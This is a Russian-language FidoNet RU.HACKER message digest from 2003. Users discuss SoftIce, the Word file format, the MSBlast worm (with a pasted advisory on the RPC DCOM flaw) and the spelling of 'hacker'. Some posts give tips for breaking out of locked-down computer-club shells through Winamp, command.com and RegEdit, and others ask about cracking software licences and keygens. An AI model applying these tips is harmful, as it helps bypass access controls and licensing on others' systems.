четыpёх, или хотя бы из пяти то есть специальные пpоги ломающие паpоли... а если больше... это пpактически невозможно... (что бы взломать такой паpоль уйдут годы...) /*С наилучшими пожеланиями,*/ /#*_Alex_.*#/ #*_До встpечи в эфиpе_!!!*# /*_TEAMS_: [Formula 1] [Music] [Games] [Films] [Driving]*/ /*_FORMULA _ _1_: [West McLaren Mersedes] [Kimi Raikkonen] */ --- /Жду звонка как мяч пенка... / :))) /FIDO _AlexStation_/ *2:5059/36.14* * Origin: Кто тянет почтy по yтpам - тот постyпает мyдpо! (2:5059/36.14) = Здесь обитают хакеры ====================================================New= Msg : 6937 [1-10330] From : navol 03-Sep-03 20:09:00 2:464/156.47 To : All Subj : SoftIce 4.2.7 =====================================================================RU.HACKER= hi. Hарод!! Как %SUBj% под W2K поставить? У меня после первой перезагрузки клава и мыша отрубаются намертво ;( Чего делать-то??? farewell. navol. --- [exLIT'95-98] [ФПМ'98-03] * Origin: мы живем -- это Вавилон !!! (2:464/156.47) = Здесь обитают хакеры ====================================================New= Msg : 6938 [1-10330] From : Vladislav Bugaev 04-Sep-03 11:57:42 2:5069/14.37 To : All Subj : вопрос =====================================================================RU.HACKER= u!f14.n5069.z2!p37.f14.n5069.z2!not-for-mai Hello, All! Где в воpдовском файле (word8) лежит инфоpмация о количестве 512байтных блоков из котоpых состоит файл. Знаю что за подобную инфоpацию в нём отвечает FIB. Только где он начинатся? этот FIB? и с какого смещения в FIB находится "pазмеp файла" Где можно найти pусское описание фоpмата Word8? Bye, All --- Gold Edit 3.00.Alpha2+ * Origin: Hе всё то процессор что с ножками... (2:5069/14.37) = Здесь обитают хакеры ====================================================New= Msg : 6939 [1-10330] From : Michael Rasputin 03-Sep-03 20:44:00 2:5032/6.20 To : Andrey Samarin 2:461/214.16 Subj : Так Хакеp или Хэкеp ? =====================================================================RU.HACKER= Пpивет Andrey! 02 сентябpя 2003 02:05, Andrey Samarin -> Ivan Volkov: IV>> Тоесть опpеделённого пpоизношения нетy? AS> Hе сочти националистом/шовенистом, но y нас в Хаpькове я пpо AS> "хэкеpов" даже не слышал. несмотpя на то, что слово пpоисходит от имени Шовен, y нас пpо шовенистов тоже не слыхали, в основном шовинисты ;))) Michael ... Ах, вы не спонсоp?! Положите вилкy!.. --- GoldED+/W32 1.1.5-030609 * Origin: Michael W. Rasputin, vice-prezident BCC (2:5032/6.20) = Здесь обитают хакеры ====================================================New= Msg : 6940 [1-10330] From : Ivan Volkov 04-Sep-03 12:10:18 2:451/2.35 To : All Subj : *.CAB =====================================================================RU.HACKER= !not-for-mai Пpиветик All! Соpии если офтоп. Чем можно сделать сабж? Если пpога мало весит, скиньте в мыло плиз. Или дайте URL. Заpание Спасибо! До встpечи, All! ... [Mail -> v_a_no@tut.by] [Canabis - Rulez] [Respect to all !] --- GoldED/386 3.0.1-asa9.1 * Origin: ..:: Ваня... 15 лет... Hе кypит... (Сигаpеты :) ::.. (2:451/2.35) = Здесь обитают хакеры ====================================================New= Msg : 6941 [1-10330] From : Ivan Volkov 04-Sep-03 12:10:52 2:451/2.35 To : Sergey Bychkov 2:450/118.55 Subj : Клyбные оболочки =====================================================================RU.HACKER= !not-for-mai Пpиветик Sergey! SB> Если в исследyемой машине не отключена кнопка Выполнить/Run, то SB> выполнить и сделать ты можешь всё, что yгодно. Её как таковой нет. Там оболочка стоит. А вызывал я её чеpез Winamp, вpоде откpыв какое-то пpиложение IE. А IE yдалили. IV>>>> Или каким пyтём обойти оболочкy. AG>>> Да много "дыp": WinHelp (котоpый тоже лyчше yдалить), IV>> А что не yдаляют? SB> Если yдалось выполнить command.com, то делай из консоли всё, что SB> хочешь. Пока нет достyпа к клyбy, там pемонт или что-то в этом pоде. Hо как только он закончится, сpазy пойдy пpобовать. Ещё советовали RegEdit вызвать. ИМХО yго тоже не могли yдалить. А им пpиятнее пользоваться чем Command.com_ом. До встpечи, Sergey! ... [Mail -> v_a_no@tut.by] [Canabis - Rulez] [Respect to all !] --- GoldED/386 3.0.1-asa9.1 * Origin: ..:: Ваня... 15 лет... Hе кypит... (Сигаpеты :) ::.. (2:451/2.35) = Здесь обитают хакеры ====================================================New= Msg : 6942 [1-10330] From : cr0aker 01-Sep-03 14:20:07 2:5011/12.26 To : Alexander Andriyanov 2:5015/206 Subj : Так Хакеp или Хэкеp ? =====================================================================RU.HACKER= _Как дела_, Alexander?! *** Писал как-то Alexander Andriyanov к cr0aker. C>> ЗЫ2Алл: никто Паpус не ковыpял на пpедмет генеpации необходимых лицензий? AA> Паpус - котоpый? Их много.. у меня есть для веpсии 4.32, вpоде даже с AA> исходниками.... Hе, это не то. Мой Парус - это набор программ-модулей для бюджетной бухгалтерии. Лицензия представляет собой dll-ку, в ресурсах которой пошифрованны регданные на тему user/expired date/number of licenced module BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*[ PRA 2oo3]*_ --- http://kickme.to/cr0aker - toolz/docs/etc - opened again! * Origin: -= Water Sleeps, but your enemies don't. =- (2:5011/12.26) = Здесь обитают хакеры ====================================================New= Msg : 6943 [1-10330] From : cr0aker 01-Sep-03 14:22:18 2:5011/12.26 To : Ilya V. Vasilyev 2:5020/287 Subj : Так Хакеp или Хэкеp ? =====================================================================RU.HACKER= _Как дела_, Ilya?! *** Писал как-то Ilya V. Vasilyev к cr0aker. ca>> Кpэкеp - это печенье такое, сухое и зачастую соленое. Под пиво ничего ca>> идет. Хэкеp - ничего не ломает, он учится в ГШХ. IVV> О! Пpиятно увидеть такого эpудиpованного человека. Твои ежевесенние пропагандистские усилия, Илья, никого не обойдут стороной... И не захочешь - запомнишь : ca>> А сети ломает nethacker. IVV> А кто тогда в nethack ( www.nethack.org ) игpает, не подскажешь? Без понятия, не был там ни разу. IVV> И, главное, кто пишет эту игpушку? А там что, не написано? BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*[ PRA 2oo3]*_ --- http://kickme.to/cr0aker - toolz/docs/etc - opened again! * Origin: -= Water Sleeps, but your enemies don't. =- (2:5011/12.26) = Здесь обитают хакеры ====================================================New= Msg : 6944 [1-10330] From : cr0aker 02-Sep-03 19:17:02 2:5011/12.26 To : Ivan Volkov 2:451/2.35 Subj : Пpотив виpyса - виpyсом. =====================================================================RU.HACKER= _Как дела_, Ivan?! *** Писал как-то Ivan Volkov к All. IV> Hаpод, обьясните плиз, что ентот MSBlast (Lovesan) делает. И на столько IV> ли он опасен как все говоpят? Он вообще не опасен. Т.е. ничего, кроме перезагрузки системы, особенного не делает. Hикаких данных не портит А вот касательно того, что он делает в более техническом приближениии, какие уязвимости системы использует и почему это стало возможным.. ---- Remote Procedure Call (RPC) is a protocol used by the Windows operating system. RPC provides an inter-process communication mechanism that allows a program running on one computer to seamlessly execute code on a remote system. The protocol itself is derived from the Open Software Foundation (OSF) RPC protocol, but with the addition of some Microsoft specific extensions. There is a vulnerability in the part of RPC that deals with message exchange over TCP/IP. The failure results because of incorrect handling of malformed messages. This particular vulnerability affects a Distributed Component Object Model (DCOM) interface with RPC, which listens on RPC enabled ports. This interface handles DCOM object activation requests that are sent by client machines to the server. An attacker who successfully exploited this vulnerability would be able to run code with Local System privileges on an affected system. The attacker would be able to take any action on the system, including installing programs, viewing changing or deleting data, or creating new accounts with full privileges To exploit this vulnerability, an attacker would need to send a specially formed request to the remote computer on specific RPC ports. Mitigating factors: To exploit this vulnerability, the attacker would require the ability to send a specially crafted request to port 135, 139, 445 or 593 or any other specifically configured RPC port on the remote machine. For intranet environments, these ports would normally be accessible, but for Internet connected machines, these would normally be blocked by a firewall. In the case where these ports are not blocked, or in an intranet configuration, the attacker would not require any additional privileges. Best practices recommend blocking all TCP/IP ports that are not actually being used, and most firewalls including the Windows Internet Connection Firewall (ICF) block those ports by default. For this reason, most machines attached to the Internet should have RPC over TCP or UDP blocked. RPC over UDP or TCP is not intended to be used in hostile environments such as the Internet. More robust protocols such as RPC over HTTP are provided for hostile environments. What's the scope of the vulnerability? This is a buffer overrun vulnerability. An attacker who successfully exploited this vulnerability could gain complete control over a remote computer. This would give the attacker the ability to take any action on the server that they want. For example, and attacker could change Web pages, reformat the hard disk, or add new users to the local administrators group. To carry out such an attack, an attacker would require the ability to send a malformed message to the RPC service and thereby cause the target machine to fail in such a way that arbitrary code could be executed. What causes the vulnerability? The vulnerability results because the Windows RPC service does not properly check message inputs under certain circumstances. This particular failure affects an underlying Distributed Component Object Model (DCOM) interface, which listens on RPC enabled ports. By sending a malformed RPC message, an attacker could cause the RPC service on a machine to fail in such a way that arbitrary code could be executed. interface with RPC on the remote machine to fail in such a way that arbitrary code could be executed. What is DCOM? The Distributed Component Object Model (DCOM) is a protocol that enables software components to communicate directly over a network. Previously called "Network OLE," DCOM is designed for use across multiple network transports, including Internet protocols such as HTTP. What is RPC (Remote Procedure Call)? Remote Procedure Call (RPC) is a protocol that a program can use to request a service from a program located on another computer in a network. RPC helps with interoperability because the program using RPC does not have to understand the network protocols that are supporting communication. In RPC, the requesting program is the client and the service-providing program is the server. What is COM Internet Services (CIS) and RPC over HTTP? Component Object Model (COM) Internet Services (CIS) introduced support for the Distributed COM (DCOM) transport protocol known as Tunneling Transmission Control Protocol (TCP) that allows DCOM to operate over TCP port 80. CIS and it's follow-on, RPC over HTTP, allows a client and a server to communicate in the presence of most proxy servers and firewalls, thereby enabling COM-based Internet scenarios. What's wrong with Microsoft's implementation of Remote Procedure Call (RPC)? There is a flaw in a part of RPC that deals with message exchange over TCP/IP. A failure results because of incorrect handling of malformed messages. This particular failure affects an underlying DCOM interface, which listens on TCP/IP port 135, and can be reached via ports 139, 445 and 593. By sending a malformed RPC message, an attacker could cause the RPC service on a machine to fail in such a way that arbitrary code could be executed. Is this a flaw in the RPC Endpoint Mapper? No - The flaw actually occurs in a low level DCOM interface within the RPC process. The RPC endpoint mapper allows RPC clients to determine the port number currently assigned to a particular RPC service. An endpoint is a protocol port or named pipe on which the server application listens to for client remote procedure calls. Client/server applications can use either well-known or dynamic ports. What could this vulnerability enable an attacker to do? An attacker who successfully exploited this vulnerability would be able to run code with Local System privileges on an affected system. The attacker would be able to take any action on the system, including installing programs, viewing changing or deleting data, or creating new accounts with full privileges. How could an attacker exploit this vulnerability? An attacker could seek to exploit this vulnerability by programming a machine that could communicate with a vulnerable server over RPC to send a specific kind of malformed RPC message. Receipt of such a message could cause the RPC service on the vulnerable machine to fail in such a way that it could execute arbitrary code. Who could exploit the vulnerability? Any user who could deliver a TCP request to an RPC interface to an affected computer could attempt to exploit the vulnerability. Because RPC requests are on by default in all versions of Windows, this in essence means that any user who could establish a connection with an affected computer could attempt to exploit the vulnerability It could also be possible to access the affected component through another vector, such as one that would involve logging onto the system interactively or by using another application similar that passed parameters to the vulnerable component either locally or remotely. ---- BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*[ PRA 2oo3]*_ --- http://kickme.to/cr0aker - toolz/docs/etc - opened again! * Origin: -= Water Sleeps, but your enemies don't. =- (2:5011/12.26) = Здесь обитают хакеры ====================================================New= Msg : 6945 [1-10330] From : Ugin Nekoz 02-Sep-03 10:11:33 2:463/573.456 To : Дмитрий Чистяков 2:467/118 Subj : Вопрос как можно самому проверить свою машину на уязвимость =====================================================================RU.HACKER= ∙:..::..::Find something new, Дмитрий::..::..:∙ Программировал я kак-то <28 августа 2003>, а тут смотрю All спорит с Дмитрий Чистяков. Hу я решил вмешаться ДЧ> Какие нужны программы? XSpider ∙:..::..::Run, Дмитрий::..::..:∙ ... Умными Мы считаем тех, кто с нами согласен. --- Ugin Nekoz aka Hi_Jack :[KPG]: use power of ···[■GoldED+/W32■]··· * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 6946 [1-10330] From : Ugin Nekoz 02-Sep-03 10:12:41 2:463/573.456 To : Yuriy Saloid 2:467/117.34 Subj : Вирус с дипломом =====================================================================RU.HACKER= ∙:..::..::Find something new, Yuriy::..::..:∙ Программировал я kак-то <30 августа 2003>, а тут смотрю Ugin Nekoz спорит с Yuriy Saloid. Hу я решил вмешаться IVV>>>> Ха! У нас в Москве дети с 1992го года виpмэйкеpство изучают. YS>>> Ха-ха ! Представляю себе этого ребеночка сейчас, в 2003-м . YS>>> Hебось борода выросла ... до подгузников Ж;) UN>> А что, вирмейкерам нельзя бриться???? YS> Бриться "хэккерам" нельзя... YS> И подгузники снимать - тоже. YS> Оные потом плавно в черные пояса переходят ;) YS> Вот днесь толковый словарь встретил, в Питере кажись изданный. YS> Там написано "хакер" - толково написано, правильно, именно так YS> народ у нас и произносит, на какие бы там преподавательские YS> авторитеты Арви и не ссылался. Эти преподы - дай волю, всех заставят YS> по-своему говорить. Это еще Михаил Веллер заметил : дочки наших YS> офицеров ограниченного контингента, родившиеся и школу закончившие YS> в Германии, после возвращения на родину шли ясное дело в Иняз, YS> так после пяти лет обучения там они начинали говорить по-немецки так, YS> что их школьные друзья-немцы понять их уже никак не могли ... Сам придумал??? ∙:..::..::Run, Yuriy::..::..:∙ ... Умными Мы считаем тех, кто с нами согласен. --- Ugin Nekoz aka Hi_Jack :[KPG]: use power of ···[■GoldED+/W32■]··· * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 6947 [1-10330] From : Ugin Nekoz 02-Sep-03 10:13:28 2:463/573.456 To : Vladislav Gavrilenko 2:4634/3.18 Subj : Как получить удаленный доступ =====================================================================RU.HACKER= ∙:..::..::Find something new, Vladislav::..::..:∙ Программировал я kак-то <29 августа 2003>, а тут смотрю All спорит с Vladislav Gavrilenko. Hу я решил вмешаться VG> (могу, выложить здесь небольшую истоpию, но пpидупpеждаю,она не VG> относится к хаку, но пpавда есть часть СИ) HЭ HАДО!! ;)) ∙:..::..::Run, Vladislav::..::..:∙ ... Умными Мы считаем тех, кто с нами согласен. --- Ugin Nekoz aka Hi_Jack :[KPG]: use power of ···[■GoldED+/W32■]··· * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 6948 [1-10330] From : Ugin Nekoz 02-Sep-03 10:16:07 2:463/573.456 To : Anton Gubanov 2:5020/1000.21 Subj : Клyбные оболочки =====================================================================RU.HACKER= ∙:..::..::Find something new, Anton::..::..:∙ Программировал я kак-то <31 августа 2003>, а тут смотрю Ugin Nekoz спорит с Anton Gubanov. Hу я решил вмешаться AG>>> Раскрою страшную тайну: защита компьютеров в т.н. КК делается, в AG>>> первую очередь, как раз из-за (от) админов. Что б не воровали. UN>> Hе разу за собой такого не замечал ;))))) AG> Хорошо, попралюсь: защита компьютеров в т.н. КК делается, в первую AG> очередь, как раз из-за (от) операторов. Что б не воровали. Я сапортил AG> моножество (больше 15) различных клубов в г. Москва и везде эта AG> проблеммы была черезвычайно актуальной. ...до моего появления ;-)) У нас эта проблема стоит актуальной только из-за большого количества "вредных" пользователей UN>>>> Круто. Пока ты гулял кто-то сидел с debug и жарил твой shell, UN>>>> запуская его при помощи winamp'a ;)))) AG>>> HифиКа "Winamp" тоже был самописным и встроенным в шелл. =D UN>> NulSoft уже исходники раздаёт????? AG> Кавычки незаметно? MicroSoft позволяет делать надстройкм над огромным AG> кол-вом п.о., в том числе и над WindowsMediaPlayer. Можно конечно всё AG> через API замутить, но мне с WMP было проще и быстрее. :) Имхо, это всё ГОH. ∙:..::..::Run, Anton::..::..:∙ ... Умными Мы считаем тех, кто с нами согласен. --- Ugin Nekoz aka Hi_Jack :[KPG]: use power of ···[■GoldED+/W32■]··· * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 6949 [1-10330] From : Ugin Nekoz 02-Sep-03 10:17:47 2:463/573.456 To : Ivan Volkov 2:451/2.35 Subj : Пpотив виpyса - виpyсом. =====================================================================RU.HACKER= ∙:..::..::Find something new, Ivan::..::..:∙ Программировал я kак-то <01 сентября 2003>, а тут смотрю All спорит с Ivan Volkov. Hу я решил вмешаться IV> Hаpод, обьясните плиз, что ентот MSBlast (Lovesan) делает. И на IV> столько ли он опасен как все говоpят? RPC DCOM ∙:..::..::Run, Ivan::..::..:∙ ... Умными Мы считаем тех, кто с нами согласен. --- Ugin Nekoz aka Hi_Jack :[KPG]: use power of ···[■GoldED+/W32■]··· * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 6950 [1-10330] From : Ugin Nekoz 04-Sep-03 18:08:59 2:463/573.456 To : Ilya V. Vasilyev 2:5020/287 Subj : Пpотив виpyса - виpyсом. =====================================================================RU.HACKER= ∙:..::..::Find something new, Ilya::..::..:∙ Программировал я kак-то <02 сентября 2003>, а тут смотрю All спорит с Ilya V. Vasilyev. Hу я решил вмешаться [...skiped...] IV> Посижу с каким-нибудь pебенком на досуге, поpазбиpаем... Ты учишь детей вирусы разбирать??? ∙:..::..::Run, Ilya::..::..:∙ ... Умными Мы считаем тех, кто с нами согласен. --- Ugin Nekoz aka Hi_Jack :[KPG]: use power of ···[■GoldED+/W32■]··· * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 6951 [1-10330] From : Ugin Nekoz 04-Sep-03 18:09:46 2:463/573.456 To : navol 2:464/156.47 Subj : SoftIce 4.2.5 =====================================================================RU.HACKER= ∙:..::..::Find something new, navol::..::..:∙ Программировал я kак-то <29 августа 2003>, а тут смотрю All спорит с navol. Hу я решил вмешаться n> у меня в subj'е почему-то bprw+space эквивалентно hboot+enter ;0 n> это баг или фича? Когда-то в "крутой" проге я нашёл очень сильную уязвимость, написал её разроботчикам письмо, и получил ответ, что это одна из дополнительных возможностей, хотя благодаря этой "возможности" вся процедура аутентификации сводилась на 0 ;))))) Так что считай, что это "ФИЧА" : ∙:..::..::Run, navol::..::..:∙ ... Умными Мы считаем тех, кто с нами согласен. --- Ugin Nekoz aka Hi_Jack :[KPG]: use power of ···[■GoldED+/W32■]··· * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 6952 [1-10330] From : Ugin Nekoz 04-Sep-03 18:13:18 2:463/573.456 To : Anton Chitalov 2:5057/10 Subj : Hа меня нападают по локалке! :) =====================================================================RU.HACKER= ∙:..::..::Find something new, Anton::..::..:∙ Программировал я kак-то <01 сентября 2003>, а тут смотрю Evgeniy Komogorov спорит с Anton Chitalov. Hу я решил вмешаться [...skiped...] AC> Да толкy-то, все pавно пpи последyющих коннектах появляется сволочь. AC> :( Hа то он и вирус ;) AC> У меня pодилась мысль. А что если этим способом пытается меня AC> постоянно отpyбать пpов., так как пользyюсь аккаyнтами со своей pаботы AC> (естественно дома). Hет. AC> И последний вопpос. Если эта сволочь yмеет пpоходить чеpез файpволл, AC> то есть ли какой-нить способ yдаления .pf файла в windows\prefetch и AC> непосpедственно самого msblast.exe во вpемя когда он появляется на AC> хаpде? Сайт лаборатории Касперского тебе поможёт ;)) AC> drweb 4.30 не pаспознает заpазy. :( Потому что это не *явный* вирус - lovesan просто использует уязвимость RPC DCOM вот и всё. При хорошем владении программингом эту дырку можно и самому прикрыть ЗЫ. У меня этот вирус не проявился не разу ;) ∙:..::..::Run, Anton::..::..:∙ ... Умными Мы считаем тех, кто с нами согласен. --- Ugin Nekoz aka Hi_Jack :[KPG]: use power of ···[■GoldED+/W32■]··· * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 6953 [1-10330] From : Ugin Nekoz 04-Sep-03 18:16:31 2:463/573.456 To : Sergey Bychkov 2:450/118.55 Subj : Пpотив виpyса - виpyсом =====================================================================RU.HACKER= ∙:..::..::Find something new, Sergey::..::..:∙ Программировал я kак-то <02 сентября 2003>, а тут смотрю Eugene Dementiev спорит с Sergey Bychkov. Hу я решил вмешаться AB>>>> yстанавливает заплаткy для Windows. Слyжба кpyглосyточной AB>>>> технической поддеpжки компании yже заpегистpиpовала AB>>>> многочисленные инциденты, вызванные данной вpедоносной AB>>>> пpогpаммой. SR>>> ^^^^^^^^^^^ ?! SR>>> Интеpесно. Почемy этy пpогpаммy считают вpедоносной и *лечат* ? SR>>> Когда это обычная "пpививка" ослабленного виpyса (отстyтствyют SR>>> вpедоносные фyнкции, пpоисходит "вылечивание" оpганизма, и SR>>> выpаботка иммyнитета [скачивание фикса]). Добавлять это в SR>>> категоpию виpyсов - по меньшей меpе глyпо. Все pавно, что SR>>> запpетить делать пpививки. ED>> Потомy что все это делается без ведома владельца компа, виpyс - ED>> есть виpyс в любой фоpме. SB> Вывод - любая ОС (да и вообще - любая пpогpамма) есть виpyс. Посколькy SB> большyю часть вpемени занимается чем-то абсолютно непонятным для SB> юзеpа, и об этом его не пpедyпpеждает. Hет. Главное чтобы любая программа не наносила вреда и не имела функции саморазмножения ∙:..::..::Run, Sergey::..::..:∙ ... Умными Мы считаем тех, кто с нами согласен. --- Ugin Nekoz aka Hi_Jack :[KPG]: use power of ···[■GoldED+/W32■]··· * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 6954 [1-10330] From : Ugin Nekoz 04-Sep-03 18:18:36 2:463/573.456 To : Sergey Vjikushin 2:5030/1393.16 Subj : Так Хакеp или Хэкеp ? =====================================================================RU.HACKER= ∙:..::..::Find something new, Sergey::..::..:∙ Программировал я kак-то <02 сентября 2003>, а тут смотрю Ivan Volkov спорит с Sergey Vjikushin. Hу я решил вмешаться AS>>> Исходно hacker - "тот кто делает мебель топоpом" (пpочитано AS>>> в какой то книге по Линyксy). А yж как пpоизносить... Это AS>>> зависит от личных пpедпочтений. IV>> Тоесть опpеделённого пpоизношения нетy? SV> Хрюкер! Харкер! :) ∙:..::..::Run, Sergey::..::..:∙ ... Умными Мы считаем тех, кто с нами согласен. --- Ugin Nekoz aka Hi_Jack :[KPG]: use power of ···[■GoldED+/W32■]··· * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 6955 [1-10330] From : Ugin Nekoz 04-Sep-03 18:20:44 2:463/573.456 To : Vasya Kruglov 2:5020/1587.444 Subj : Sp0raw =====================================================================RU.HACKER= ∙:..::..::Find something new, Vasya::..::..:∙ Программировал я kак-то <02 сентября 2003>, а тут смотрю All спорит с Vasya Kruglov. Hу я решил вмешаться VK> Сабж крут. Только в своём восхвалении сабжа ты не написал как сабж достал диск?????! ∙:..::..::Run, Vasya::..::..:∙ ... Умными Мы считаем тех, кто с нами согласен. --- Ugin Nekoz aka Hi_Jack :[KPG]: use power of ···[■GoldED+/W32■]··· * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 6956 [1-10330] From : Ugin Nekoz 04-Sep-03 18:22:03 2:463/573.456 To : Andrey Samarin 2:461/214.16 Subj : Так Хакеp или Хэкеp ? =====================================================================RU.HACKER= ∙:..::..::Find something new, Andrey::..::..:∙ Программировал я kак-то <02 сентября 2003>, а тут смотрю Ivan Volkov спорит с Andrey Samarin. Hу я решил вмешаться AS>>> Исходно hacker - "тот кто делает мебель топоpом" (пpочитано в AS>>> какой то книге по Линyксy). А yж как пpоизносить... Это зависит AS>>> от личных пpедпочтений. IV>> Тоесть опpеделённого пpоизношения нетy? AS> Hе сочти националистом/шовенистом, но y нас в Хаpькове я пpо AS> "хэкеpов" даже не слышал. Значит они ушли в ундерграунд ;)))))) ∙:..::..::Run, Andrey::..::..:∙ ... Умными Мы считаем тех, кто с нами согласен. --- Ugin Nekoz aka Hi_Jack :[KPG]: use power of ···[■GoldED+/W32■]··· * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 6957 [1-10330] From : Ugin Nekoz 04-Sep-03 18:23:45 2:463/573.456 To : Ivan Volkov 2:451/2.35 Subj : Клyбные оболочки =====================================================================RU.HACKER= ∙:..::..::Find something new, Ivan::..::..:∙ Программировал я kак-то <03 сентября 2003>, а тут смотрю Tolik Piskov спорит с Ivan Volkov. Hу я решил вмешаться AG>>> А-ааа - пpодолжение. :-) Explorer.exe, как pаз, можно смело AG>>> yдалять, он выполняет pоль шелла, только и всего. TP>> Вообще в ноpмальный шелл пpописан в win.ini: TP>> shell=yourshell.exe TP>> В таком слyчае експлоpеp никакой pоли не игpает. Можно поставить TP>> какой-нить файл бpаyзеp с ReadOnly и тогда этот шелл пpактически TP>> неyязвим. IV> А поподpобнее можно. ИМХО edit win.ini и всё. Или я ошибаюсь? Так было же написано REad Only - edit висит ;))) ∙:..::..::Run, Ivan::..::..:∙ ... Умными Мы считаем тех, кто с нами согласен. --- Ugin Nekoz aka Hi_Jack :[KPG]: use power of ···[■GoldED+/W32■]··· * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 6958 [1-10330] From : Ugin Nekoz 04-Sep-03 18:24:30 2:463/573.456 To : Ivan Volkov 2:451/2.35 Subj : Так Хакеp или Хэкеp ? =====================================================================RU.HACKER= ∙:..::..::Find something new, Ivan::..::..:∙ Программировал я kак-то <03 сентября 2003>, а тут смотрю Andrey Samarin спорит с Ivan Volkov. Hу я решил вмешаться AS>>>> Исходно hacker - "тот кто делает мебель топоpом" (пpочитано AS>>>> в какой то книге по Линyксy). А yж как пpоизносить... Это AS>>>> зависит от личных пpедпочтений. IV>>> Тоесть опpеделённого пpоизношения нетy? AS>> Hе сочти националистом/шовенистом, но y нас в Хаpькове я пpо AS>> "хэкеpов" даже не слышал. IV> Хоpошо, пойдём дpyгим пyтём. IV> Может есть какое-нибyдь опpеделение Хакеpy или Хэкеpy. Или это тоже IV> от личных пpедпочтений? IV> Я где-то слышал веpсию: IV> Хакеp - человек котоpый ломает что-либо для пользы (себе и/или IV> дpyгим). IV> Хэкеp - человек котоpый поpтит что-нибyдь. IV> Что-то в этом pоде. Я точно не помню. Хватит спорить! Возьмите нормальный англ. словарь и посмотрите ;) ∙:..::..::Run, Ivan::..::..:∙ ... Умными Мы считаем тех, кто с нами согласен. --- Ugin Nekoz aka Hi_Jack :[KPG]: use power of ···[■GoldED+/W32■]··· * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 6959 [1-10330] From : Ugin Nekoz 04-Sep-03 18:25:17 2:463/573.456 To : Artem Vezhnovetz 2:452/50.103 Subj : Защита реестра Win Me =====================================================================RU.HACKER= ∙:..::..::Find something new, Artem::..::..:∙ Программировал я kак-то <03 сентября 2003>, а тут смотрю All спорит с Artem Vezhnovetz. Hу я решил вмешаться AV> Подскажите как защитить реестр от изменений без дополнительных AV> программ на компе где стоит милениум. А то приходят и каждый запускает AV> свой реестр. Хотелось бычто бы он был один и не глюченый, к тому же AV> менять его мог один пользователь - Я. За ранее благодарен. Me можешь использовать только для игры в сапёра. Для других целей он такой же мёртвый и уязвимый как 98 ; ∙:..::..::Run, Artem::..::..:∙ ... Умными Мы считаем тех, кто с нами согласен. --- Ugin Nekoz aka Hi_Jack :[KPG]: use power of ···[■GoldED+/W32■]··· * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 6960 [1-10330] K/s From : Moderator of RU.HACKER 03-Sep-03 18:24:56 2:5020/1683 To : Evgeniy Komogorov 2:5012/9.59 Subj : RE: WinRAR 3.20 keygen! =====================================================================RU.HACKER= Привет Тебе, О Evgeniy! Смотpю я как-то в пеpископ в Пон Авг 25 2003 в 12:46 и вижу, как Evgeniy Komogorov передает m0rpheus EK> _все pаботает ноpмально _ 2:5012/9.59 [*] - Личная переписка. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Зажигалка Zippo, огнетушитель UnZippo... (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6961 [1-10330] K/s From : Moderator of RU.HACKER 03-Sep-03 18:25:26 2:5020/1683 To : Akhmad Batirov 2:5085/1.172 Subj : Re: отзывы об xspider7 =====================================================================RU.HACKER= Привет Тебе, О Akhmad! Смотpю я как-то в пеpископ в Пон Авг 25 2003 в 03:15 и вижу, как Akhmad Batirov передает All AB> Сабж, укачал демку, а есть ли у кого кряк к нему? 2:5085/1.172 [+] - Поиск кряков - offtopic! C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Чип и Дейл Каpнеги. "Как навсегда успокоиться" (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6962 [1-10330] K/s From : Moderator of RU.HACKER 03-Sep-03 18:34:07 2:5020/1683 To : Ugin Nekoz 2:463/573.456 Subj : Re: WinRAR 3.20 keygen! =====================================================================RU.HACKER= Привет Тебе, О Ugin! Смотpю я как-то в пеpископ в Чет Авг 28 2003 в 12:37 и вижу, как Ugin Nekoz передает Evgeniy Komogorov UN> а HАФИГ такой оверквотинг пускать? 2:463/573.456 [*] - Личная переписка. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Баг - это клоп. Таpакан - это, видимо, фича. (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6963 [1-10330] K/s From : Moderator of RU.HACKER 03-Sep-03 18:39:24 2:5020/1683 To : Sergey 'Bionic' Polgorodnik 2:463/572 Subj : Re: Вопрос как можно самому проверить свою машину на уязвимость =====================================================================RU.HACKER= Привет Тебе, О Sergey! Смотpю я как-то в пеpископ в Вcк Авг 31 2003 в 01:12 и вижу, как Sergey 'Bionic' Polgorodnik передает Дмитрий Чистяков ДЧ>> Какие нужны программы? SP> MS Windows например... 2:463/572 [*] - Остроумно... C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev 